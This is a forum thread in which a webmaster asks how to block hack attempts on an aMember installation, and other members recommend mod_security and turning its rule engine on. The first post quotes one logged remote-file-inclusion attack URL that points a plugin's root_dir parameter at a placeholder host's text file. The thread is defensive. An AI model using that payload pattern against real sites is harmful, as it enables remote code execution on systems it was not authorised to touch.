Welcome to WebmasterWorld Guest from 3.231.229.89
Forum Moderators: Ocean10000 & phranque
block hack attempts via htaccess?
Full Member
joined:Mar 7, 2003
posts:301
votes: 0
I get a ton of hack attempts on my amember system using the following and similar urls:
/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://safe-bx.example.com/test.txt?
Wondering if there's a way to deny site wide access to any url requesting
test.txt using .htaccess
Thanks.
[edited by: jdMorgan at 2:14 pm (utc) on Feb. 6, 2008]
[edit reason] example.com [/edit]
Senior Member
joined:Nov 11, 2001
posts:5507
votes: 5
some recent and similar threads:
[webmasterworld.com...]
[webmasterworld.com...]
Many thanks to Jim.
Senior Member
joined:June 17, 2002
posts:1189
votes: 6
A good solution is modsecurity.
It will stop this and attacks you don't already know about.
Easily installs / integrates with apache. Needs a bit of dry run testing at first but once installed you just leave it turn away the bad guys at the door.
Full Member
joined:Mar 7, 2003
posts:301
votes: 0
Thanks. Installed modsecurity.
Any suggestion on a config for blocking the above?
Senior Member
joined:June 17, 2002
posts:1189
votes: 6
Modsecurity blocks it from doing what it is trying to do.
Mod security is telling you an exploit attempt was detected and it issued a 500 / 40x error (not that the transmitting end would recognise it as they are fire and forget).
To block it totally from accessing your server you need to deny the ip address but you do not know that before hand as different proxies / compromised devices are being used everytime.
Full Member
joined:Mar 7, 2003
posts:301
votes: 0
Its still showing up in my joomla logs, so its not being blocked.
Maybe its related, but I had to turn off SecFilterCheckURLEncoding directive because some of my legit urls use odd characters.
Senior Member
joined:June 17, 2002
posts:1189
votes: 6
Out of the box modsecurity is probably set to log mode only. This is where it will record actions in the modsec log file but not actually block.
Look at the modsecurity_crs_10_config.conf file and set
SecRuleEngine On
Join The Conversation
- Register For Free! - Become a Pro Member!
- See forum categories - Enter the Forum
Moderators and Top Contributors
- Moderator List | Top Contributors:This Week, This Month, Nov, Oct, Archive, Top 100 All Time, Top Voted Members
Hot Threads This Week
- Google Updates and SERP Changes - December 2019
- Google Updates and SERP Changes - November 2019
- December 2019 AdSense Earnings & Observations
- UK Search Engine, Mojeek Invests in New Servers
- RIPE NCC Runs Out of IPv4 Addresses: Calls For Faster Progress on IPv6
- Sundar Pichai Appointed Alphabet CEO
- .Org Registry Acquired By Private Equity Company
- Sir Tim Berners-Lee: "Contract for the Web" With Backing From Over 80 Organisations
- Google Spam & Hacked Machines
- Changed Website platform HTML to WordPress then Website Ranking Drop
Featured Threads
- Google Updates and SERP Changes - December 2019
- UK Search Engine, Mojeek Invests in New Servers
- Sundar Pichai Appointed Alphabet CEO
- RIPE NCC Runs Out of IPv4 Addresses: Calls For Faster Progress on IPv6
- Sir Tim Berners-Lee: "Contract for the Web" With Backing From Over 80 Organisations
- Twitter Adds 2FA With No Need For A Phone Number
- .Org Registry Acquired By Private Equity Company
- Return of CPU Vulnerability: ZombieLoad Attack
- Google Updates and SERP Changes - November 2019
- Google Rolls Out Search Console Speed Report